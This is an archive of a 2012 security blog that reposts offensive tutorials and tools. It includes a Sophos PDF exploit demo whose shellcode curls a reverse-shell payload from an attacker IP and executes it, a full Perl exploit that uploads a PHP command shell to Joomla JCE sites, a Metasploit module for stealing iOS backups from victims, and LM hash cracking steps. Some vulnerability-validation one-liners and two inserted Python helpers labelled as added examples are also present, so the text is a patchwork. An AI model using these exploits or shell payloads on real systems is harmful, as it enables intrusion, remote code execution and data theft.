Nov 10, 2012

DVWA on the cloud.


If you want to learn web security, I think DVWA is a good choice to practice with. And I'm so excited that DVWA is now on the cloud at the Hack.me website. You can learn and hack DVWA at https://hack.me/101047/dvwa-107.html

Try it if you love web security :)

 
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 9, 2012

Metasploit post exploitation scripts to steal iOS 5 backups By SecurityLearn

If you want full article, please go to the Source.

Metasploit contains a post exploitation module using which we can steal the Apple iOS backup files from a victim’s computer. However the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups.

Usage Steps:
1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory.
2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory.
3. Open the Metasploit using msfconsole.
4. Use meterpreter as a payload and exploit a vulnerability in the target system.


The above script searches for the iOS backup files in the default iTunes backup locations. If it does not find any backup on the target system, it displays the message 'No users found with an iTunes backup directory'. If it finds the backup, it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory.
[Figure: iPhone backup path in Windows & Mac OS X]

Source: http://www.securitylearn.net/2012/09/09/metasploit-post-exploitation-scripts-to-steal-ios-5-backups/


 


Nov 7, 2012

Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

If you want details, please go to the Source. 
 
1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make
4) Upload index.html, exploit.bin and exploit.png on a web server
5) Initiate a Metasploit multihandler

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

6) On the target, open the index.html file in a browser

7) Exploit the session :) 

sessions -i 1
id
/sbin/ifconfig
uname -a
 
Source: http://eromang.zataz.com/2012/11/06/sophos-anti-virus-sophail-pdf-vulnerability-metasploit-payload-demo/ 



Howto: Crack LM Hashes

I cut this tip from "Password Audit On Windows Active Directory"; if you want the other steps or more detail, please go to the Source.


Crack the Hashes
The default way that Windows stores hashes is with LAN Manager (LM). This means that if the password is 14 characters or less, regardless of complexity, it stores them as two separate 7-character passwords (so to speak), which means that when you crack a 14-character LM hash, it's really only cracking two separate 7-character passwords, which doesn't take all that long. If the passwords are longer than 14 characters, it takes a lot longer to crack. So what I did was separate out the 14-character-or-less passwords from the hash dump. "How?" you say? You can identify the LM hash versus the NTLM hashes: the NTLM hashes start with "aad3b435". So I excluded them from my crack for now, to crack later. (Note: You can use GPO settings to force all passwords to be stored in NTLM regardless of length.)
Type the following:
root@bt:~# cat achmed_dc.txt | grep ":::" | grep -v ":aad3b4" > achmedhash.txt

This will pull the hash lines (":::") from our output file from Metasploit, then look for any "aad3b4" lines and omit them (-v), and output the rest to achmedhash.txt. This is the file we will send to john. Type the following:
root@bt:~# /pentest/passwords/john/john --format=lm achmedhash.txt
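An added example (not from the original post) that does the same LM/NT split as the grep pipeline above in Python, so the result can be reported as an audit finding rather than only fed to john. It assumes the pwdump-style user:RID:LM:NT::: line format and uses constructed sample hashes; aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, which is what the LM field holds when a password is not stored in LM form, and since each LM half covers 7 characters an empty second half flags passwords of 7 characters or fewer for policy follow-up.

```python
import re

# LM hash of the empty string: the LM field holds this value when the account's
# password is not stored in LM form (the "aad3b4..." prefix the grep filters on).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# Each LM hash is two independent halves, one per 7-character chunk, so a second
# half equal to the empty-string half means the password is 7 characters or fewer.
EMPTY_HALF = EMPTY_LM[:16]

# pwdump/hashdump line layout assumed here: user:RID:LM:NT:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_line(line):
    """Return (user, rid, lm, nt) for a hashdump line, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.groups()
    return user, int(rid), lm.lower(), nt.lower()


def classify_lm(lm):
    """'none' if no LM hash is stored, 'short' if only the first half is
    populated (password of 7 characters or fewer), otherwise 'full'."""
    if lm == EMPTY_LM:
        return "none"
    if lm[16:] == EMPTY_HALF:
        return "short"
    return "full"


def audit_dump(text):
    """Split a dump into accounts that still have an LM hash (what the grep
    pipeline keeps) and NT-only accounts (what 'grep -v :aad3b4' drops)."""
    lm_accounts, nt_only = [], []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # banner/progress lines from the dump tool
        user, _rid, lm, _nt = rec
        kind = classify_lm(lm)
        (nt_only if kind == "none" else lm_accounts).append((user, kind))
    return lm_accounts, nt_only


# Constructed sample dump; hash values are made up, except the empty-LM marker.
SAMPLE_DUMP = """
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_backup:1104:1122334455667788aad3b435b51404ee:fedcba9876543210fedcba9876543210:::
jdoe:1105:0011223344556677aabbccddeeff0011:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    with_lm, nt_only = audit_dump(SAMPLE_DUMP)
    print("LM hashes present:", with_lm)
    print("NT only:", nt_only)
```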


Source: http://ben0xa.com/password-audit-on-windows-active-directory/


Nov 6, 2012

XSS For Defacement

A nice example of XSS.

 


Android SMS Spoofer

If you want to download this app (APK), please go to the Source.

Proof of Concept app which takes advantage of Android's SmsReceiverService being exported to fake an incoming SMS with no permissions.
On 2012-10-30 NCSU notified Google about a "Smishing" vulnerability (1) in Android. The vulnerability appears to be due to Android exporting SmsReceiverService in the com.android.mms app with no apparent restrictions. A third party app can therefore pass an explicit Intent to the SMS app containing a fake SMS message and the SMS app will process it.
This issue has been known about and used for some time (2,3,4) by test apps and apps designed to intercept, alter and pass on SMS messages. NCSU were the first to publicly highlight the security vulnerability that arises from this functionality, namely that a user can be tricked into taking action on a faked SMS message.
This PoC app simply wraps existing code already made public so that the issue can be validated and countermeasures designed while users wait for the patch.

Source: https://github.com/thomascannon/android-sms-spoof



Bash One-liners to Validate Vulnerabilities on Multiple Hosts By Amit Bagree.

It's very helpful to be able to validate vulnerabilities with a one-line command.

CVE-2011-1473

McAfee Vulnerability Manager: Web Server Supports Outdated SSLv2 Protocol
Nessus:
SSL Version 2 (v2) Protocol Detection
 root@bt:~# for i in `cat Affected-SSLv2-IPs.txt`; do echo -e "\n----START "$i"----" ; echo -e "HEAD / HTTP/1.0\n\n" | openssl s_client -connect "$i" -ssl2; echo -e "\n----END "$i"----"; done > SSLv2-Output.txt
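The one-liners in this post write each host's openssl s_client transcript between ----START host---- and ----END host---- markers. As an added example (not from the original post), here is a Python parser for that file layout that reports which hosts actually completed an SSLv2 handshake, judged by the Cipher line of s_client's session summary; the sample transcript is constructed.

```python
import re

# Constructed sample of SSLv2-Output.txt as the loop above writes it: one
# "----START host----" ... "----END host----" block per host around the
# openssl s_client transcript.  Transcript contents are abbreviated/made up.
SAMPLE_OUTPUT = """
----START 192.0.2.10:443----
CONNECTED(00000003)
New, SSLv2, Cipher is DES-CBC3-MD5
SSL-Session:
    Protocol  : SSLv2
    Cipher    : DES-CBC3-MD5
----END 192.0.2.10:443----

----START 192.0.2.11:443----
CONNECTED(00000003)
error:ssl handshake failure (constructed placeholder for the OpenSSL error line)
New, (NONE), Cipher is (NONE)
SSL-Session:
    Protocol  : SSLv2
    Cipher    : 0000
----END 192.0.2.11:443----
"""

BLOCK_RE = re.compile(
    r"----START (?P<host>\S+)----\n(?P<body>.*?)\n----END (?P=host)----", re.S)
# Cipher line of the SSL-Session summary; "0000" means nothing was negotiated.
CIPHER_RE = re.compile(r"^\s*Cipher\s*:\s*(\S+)", re.M)


def split_blocks(text):
    """Map each host to the transcript captured between its START/END markers."""
    return {m.group("host"): m.group("body") for m in BLOCK_RE.finditer(text)}


def negotiated_cipher(transcript):
    """Cipher from the session summary, or None if the handshake failed."""
    m = CIPHER_RE.search(transcript)
    if not m or m.group(1) in ("0000", "(NONE)"):
        return None
    return m.group(1)


def sslv2_findings(text):
    """Hosts that completed an SSLv2 handshake (finding confirmed) vs. those that refused."""
    confirmed, refused = {}, []
    for host, body in split_blocks(text).items():
        cipher = negotiated_cipher(body)
        if cipher:
            confirmed[host] = cipher
        else:
            refused.append(host)
    return confirmed, refused


if __name__ == "__main__":
    print(sslv2_findings(SAMPLE_OUTPUT))
```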


CVE-2009-3555

McAfee Vulnerability Manager: TLS / SSL Man-In-The-Middle Renegotiation Vulnerability
Nessus:
SSL / TLS Renegotiation DoS & SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
  root@bt:~# paste SSL-Renego-IPs.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "HEAD / HTTP/1.0\nR\n\n" | ncat --ssl "$IP" "$port"; echo -e "\n----END "$IP":"$port"----\n"; done


Where SSL-Renego-IPs.txt has an IP address and port number on each line separated by a space. You can use OpenSSL instead of Ncat as well. An online test tool is available here.

CVE-2008-1447

McAfee Vulnerability Manager: ISC BIND DNS Out-Of-Bailiwick Cache Poisoning
Nessus:
Multiple Vendor DNS Query ID Field Prediction Cache Poisoning
  root@bt:~# for i in `cat DNS-CachePoison-IPs.txt`; do dig @"$i" +short porttest.dns-oarc.net TXT; done > DNS-CachePoison-Output.txt


CVE-2006-0987

Nessus: DNS Server Spoofed Request Amplification DDoS
  root@bt:~# for i in `cat DNSRootAmpDoS-IPs.txt`; do dig @"$i" . NS; done > DNSRootAmpDoS-Output.txt


CVE-2002-1623

McAfee Vulnerability Manager: Internet Key Exchange (IKE) Aggressive Mode with Pre-Shared Key
Nessus:
IKE Server Allows Aggressive Mode for Shared Secret Authentication
  root@bt:~# for i in `cat IKE-AggresiveMode-IPs.txt`; do sudo ike-scan -M -A "$i"; done > IKE-AggresiveMode-Output.txt


CVE-2003-1567, CVE-2004-2320, CVE-2010-0386

McAfee Vulnerability Manager: Web Server HTTP TRACE or TRACK Methods Enabled
Nessus:
HTTP TRACE / TRACK Methods Allowed
  root@bt:~# paste Trace-IPs-SSL.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "TRACE / HTTP/1.0\n\n" | ncat --ssl "$IP" "$port"; echo -e "\n----END "$IP":"$port"----\n"; done > Trace-SSL-IPs-Output.txt


CVE-2006-3918, CVE-2007-5944

McAfee Vulnerability Manager: F-Secure Policy Manager Expect Header Cross-Site Scripting
Nessus:
Web Server Expect Header XSS
  root@bt:~# for i in `cat ExpectHeaderXss-IPs.txt`; do echo -e "\n----START "$i"----" ; echo -e "GET / HTTP/1.0\nExpect: <script>alert(1)</script>\n\n" | openssl s_client -quiet -connect "$i":443; echo -e "\n----END "$i"----"; done > M-ExpectHeaderXss-Output.txt


CVE-2007-6203

Nessus: Apache HTTP Method Request Entity XSS
  root@bt:~# for i in `cat ApacheMethodRequestXSS-IPs.txt`; do echo -e "\n----START "$i"----" ; echo -e "<script>alert(1)</script> / HTTP/1.1\nHost: foundstone.com\nConnection: close\nContent-length: -1\n\n" | nc "$i" 80; echo -e "\n----END "$i"----"; done > ApacheMethodRequestXSS-Output.txt


SSL Ciphers and Certs

Couple of quick tips/tools for checking weak SSL ciphers, expired SSL certificates, certificates with weak signature algorithms, etc...

SSLSmart

Download here. Simply import your IPs with port info like 127.0.0.1:8080 from a text file and click ‘Start Test’. The advantage with SSLSmart is that if you perform a ‘Content’ test you can catch that pesky system which would allow a weak cipher connection but then display a page saying you are not good enough to connect to it. The two methods below won’t catch this false positive.

SSLAudit.pl

Another nice tool is the Perl script SSLAudit.pl. The nice feature is that the results are graded as per the SSLLabs SSL Server Rating Guide. If you are providing a list of IPs, you will notice quickly that the tool errors out without performing the checks if there is a hostname mismatch (Errors - Hostname verification failed, Hostname mismatch). Worry not! Just disable the mismatch check. To apply the patch:
root@bt:~# wget https://sslaudit.googlecode.com/files/SSLAudit%20r6%20%2820100119%29.zip
root@bt:~# unzip SSLAudit\ r6\ \(20100119\).zip 
root@bt:~# wget https://github.com/OpenSecurityResearch/pentest-scripts/blob/master/SSLAudit-r6-20100119-RemoveHostnameCheck.patch
root@bt:~# patch -p1 < SSLAudit-r6-20100119-RemoveHostnameCheck.patch


Then you're all ready to:
  root@bt:~# cat All_SSL_IPs.txt | while read IP port; do echo -e "\n----START "$IP":"$port"----"; perl SSLAudit.pl "$IP" "$port"; echo -e "\n----END "$IP":"$port"----\n"; done > All_SSLAudit_Output.txt


Oh by the way you would need the following modules for SSLAudit to work:
  • inifiles
  • libio-socket-ssl-perl
  • libtime-modules-perl

ssl-enum-ciphers.nasl

  root@bt:~# nmap --script ssl-enum-ciphers -p port/s IP-Address/es


Non-Recursive DNS Queries

  root@bt:~# for i in `cat DNS-NonRecursive-IPs.txt`; do dig @"$i" www.google.com A +norecurse; done > DNS-NonRecurive-Output.txt


Assuming www.google.com would be cached. You can make it cache first if you wish.

Checking Remote NTP version

  root@bt:~# for i in `cat NTPVersion-IPs.txt`; do echo -e "\n----START "$i"----" ; ntpq -c readvar "$i"; echo -e "\n----END "$i"----"; done > NTPVersion-Output.txt


Check XSS in URL/URL parameter using Curl

  root@bt:~# curl 'http://127.0.0.1/<script>alert(1)</script>' | grep 'alert(1)'


Download a specific file from multiple IPs

  root@bt:~# for i in `cat IPs.txt`; do curl -o "$i"_crossdomain.xml "http://"$i"/crossdomain.xml"; done
  root@bt:~# for i in `cat IPs-SSL.txt`; do curl -k -o "$i"_robots.txt "https://"$i"/robots.txt"; done

 

Source: http://blog.opensecurityresearch.com/2012/10/for-loops-bash-one-liners-to-validate.html


PySQLi - Python SQL injection framework

PySQLi is a python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated bricks that can be used to build advanced exploits or easily extended/improved to fit the case.

Source: https://github.com/sysdream/pysqli


Joomla JCE 2.0.10 Shell Upload Exploit

After the release of the vendor-supplied patch for JCE's vulnerabilities, AmnPardaz is going to publish the related PoC for this issue in Perl and PHP one month later, for educational purposes.

Perl Version:
 
######################################### www.bugreport.ir ########################################
#
#                     AmnPardaz Security Research & Penetration Testing Group
#
#
# Title:                  Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vendor:                 http://www.joomlacontenteditor.net
# Vulnerable Version:     JCE 2.0.10 (prior versions also may be affected)
# Exploitation:           Remote with browser
# Original Advisory:      http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:  http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score:       (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5        
# Coded By:               iraqi h4ck
###################################################################################################
use IO::Socket;
use LWP::Simple;
system("cls");
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||        Coded by: iraqi h4ck (admin[@]0-Day[dot]net)      ||||\n\n";
print "\t+--> Usage:   perl $0 <host>        <--+\n";
print "\t+--> Example: perl $0 localhost     <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||        Coded by: iraqi h4ck (admin[@]0-Day[dot]net)      ||||\n\n";
$TARGET = $ARGV[0];
$PORT   = "80";
$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
$SHELL  = "/images/stories/0day.php?cmd=";
$HTTP   = "http://";
 
$header1G = "GET $SCRIPT HTTP/1.1";
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";
$header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
$header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
$header2 = "Host: $TARGET";
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
$header5 = "Content-Length: 769";
$header6 = "-----------------------------41184676334";
$header7 = 'Content-Disposition: form-data; name="upload-dir"';
$header8 = '/';
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
$header10 = 'Content-Type: application/octet-stream';
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
$header12 = "0";
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
$header14 = 'Content-Type: image/gif';
$header15 = 'GIF89aG';
$header16 = "<? system($_GET['cmd']);exit; ?>";
$header17 = 'Content-Disposition: form-data; name="upload-name"';
$header18 = '0day';
$header19 = 'Content-Disposition: form-data; name="action"';
$header20 = 'upload';
$header21 = "-----------------------------41184676334--";
$header22 = 'X-Request: JSON';
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
$header24 = "Content-Length: ".length($header25)."";
 
############################################### Packet 1 --> Checking Exploitability #########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=$TARGET.$SCRIPT;
$simplePage=get($pageURL);
@arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
while (($count!=10) && ($die != 1)) {
foreach $arr(@arr){
if ($simplePage =~ m/$arr/) {
print "\n[*] Target patched.\n\n";
$die = 1;
} else {
$count++;
}
}
}
if ($count==5) {print "[*] Target is exploitable.\n\n"};
############################################### Packet 2 --> Uploading shell as a gif file #########################################################
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
############################################### Packet 3 --> Change Extension from .gif to .php #########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
############################################### Packet 4 --> Check for successfully uploaded #########################################################
$shellurl=$TARGET.$SHELL;
$output=get($shellurl);
while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}

Source: http://www.1337day.com/exploits/19691


Nov 5, 2012

Howto: Fix Firefox Error "your firefox profile cannot be loaded. it may be missing or inaccessible" On Ubuntu

When I upgraded my Firefox to the latest version, I couldn't open it; it said "your firefox profile cannot be loaded. it may be missing or inaccessible". I think this is because the user that runs Firefox doesn't have permission to open or create the new profile created by the installer (I think it uses root permission for that). So this post is about how to fix it. Just use

chown -R USER:GROUP /home/USER/.mozilla/

Now the problem has gone, have a nice day. :)
